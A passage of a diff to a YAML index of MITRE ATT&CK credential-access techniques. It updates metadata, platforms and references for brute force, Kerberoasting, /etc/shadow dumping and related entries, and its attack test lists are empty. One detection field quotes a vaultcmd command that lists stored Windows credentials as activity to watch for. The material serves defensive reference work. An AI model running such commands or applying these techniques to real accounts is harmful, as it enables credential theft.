       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      - Azure AD
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Process: Process Creation'
@@ -46782,17 +47533,14 @@ credential-access:
         url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
       - source_name: Microsoft Midnight Blizzard Replay Attack
         description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
-          Retrieved September 27, 2023.
-        url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+          Retrieved September 12, 2024.
+        url: https://x.com/MsftSecIntel/status/1671579359994343425
       - source_name: Technet MS14-068
         description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
           Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
         url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -46865,12 +47613,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1110:
     technique:
-      modified: '2024-01-29T18:53:26.593Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Brute Force
       description: |-
         Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -46879,6 +47626,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - David Fiser, @anu4is, Trend Micro
       - Alfredo Oliveira, Trend Micro
@@ -46897,18 +47645,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
@@ -46932,13 +47680,10 @@ credential-access:
         url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.004:
     technique:
-      modified: '2024-03-07T14:28:02.910Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Credential Stuffing'
       description: |-
         Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -46964,6 +47709,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
@@ -46975,18 +47721,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'User Account: User Account Authentication'
@@ -47005,14 +47751,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.004
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -47041,24 +47784,26 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -47093,13 +47838,10 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1187:
     technique:
-      modified: '2023-08-14T19:30:45.123Z'
+      modified: '2024-10-15T16:33:34.508Z'
       name: Forced Authentication
       description: |-
         Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -47177,14 +47919,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Server_Message_Block
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1187
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -47200,6 +47941,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -47208,13 +47950,13 @@ credential-access:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -47222,15 +47964,11 @@ credential-access:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -47241,9 +47979,8 @@ credential-access:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -47289,7 +48026,7 @@ credential-access:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -47308,17 +48045,16 @@ credential-access:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -47351,10 +48087,9 @@ credential-access:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -47391,11 +48126,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.006:
     technique:
-      modified: '2023-09-30T20:24:19.357Z'
+      modified: '2024-10-15T14:20:16.722Z'
       name: Cloud Secrets Management Stores
       description: "Adversaries may acquire credentials from cloud-native secret management
         solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47463,34 +48197,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.008:
     technique:
-      x_mitre_platforms:
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
-      type: attack-pattern
-      created: '2020-02-11T18:46:56.263Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - url: https://attack.mitre.org/techniques/T1003/008
-        external_id: T1003.008
-        source_name: mitre-attack
-      - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
-          File Formats. Retrieved February 19, 2020.
-        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
-        source_name: Linux Password and Shadow File Formats
-      - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
-          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
-          2020.'
-        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-        source_name: nixCraft - John the Ripper
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-25T20:48:04.491Z'
       name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
       description: |
         Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47499,20 +48209,42 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
         distributions, can be used to watch for hostile processes attempting to access
         <code>/etc/passwd</code> and <code>/etc/shadow</code>, alerting on the pid,
         process name, and arguments of such programs.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+      created: '2020-02-11T18:46:56.263Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/008
+        external_id: T1003.008
+      - source_name: Linux Password and Shadow File Formats
+        description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+          File Formats. Retrieved February 19, 2020.
+        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+      - source_name: nixCraft - John the Ripper
+        description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+          2020.'
+        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.008
     atomic_tests: []
   T1558.002:
@@ -47544,7 +48276,7 @@ credential-access:
           from Memory. Retrieved October 11, 2019.
         url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
         source_name: Medium Detecting Attempts to Steal Passwords from Memory
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T21:46:46.831Z'
       name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
       description: |-
         Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -47570,13 +48302,11 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.002
     atomic_tests: []
   T1555.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:44:35.906Z'
       name: 'Credentials from Password Stores: Windows Credential Manager'
       description: |-
         Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -47593,24 +48323,24 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Bernaldo Penas Antelo
+      - Mugdha Peter Bansode
+      - Uriel Kosayev
+      - Vadim Khrykov
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)
 
         Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
 
         Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Bernaldo Penas Antelo
-      - Mugdha Peter Bansode
-      - Uriel Kosayev
-      - Vadim Khrykov
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -47651,36 +48381,13 @@ credential-access:
         url: https://www.passcape.com/windows_password_recovery_vault_explorer
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.004
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -47701,6 +48408,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -47715,52 +48423,42 @@ credential-access:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -47782,6 +48480,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -47792,23 +48491,50 @@ credential-access:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1111:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:37:20.612Z'
       name: Multi-Factor Authentication Interception
       description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
         (i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -47879,9 +48605,8 @@ credential-access:
         url: https://sec.okta.com/scatterswine
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.003:
     technique:
@@ -47940,12 +48665,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.003
     atomic_tests: []
   T1558.003:
     technique:
-      modified: '2023-03-30T21:01:46.538Z'
+      modified: '2024-09-23T22:20:10.994Z'
       name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
       description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
         (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -47977,6 +48701,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -47986,7 +48711,6 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -47998,111 +48722,49 @@ credential-access:
       id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
       created: '2020-02-11T18:43:38.588Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1558/003
         external_id: T1558.003
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
       - source_name: Empire InvokeKerberoast Oct 2016
         description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
           March 22, 2018.
         url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
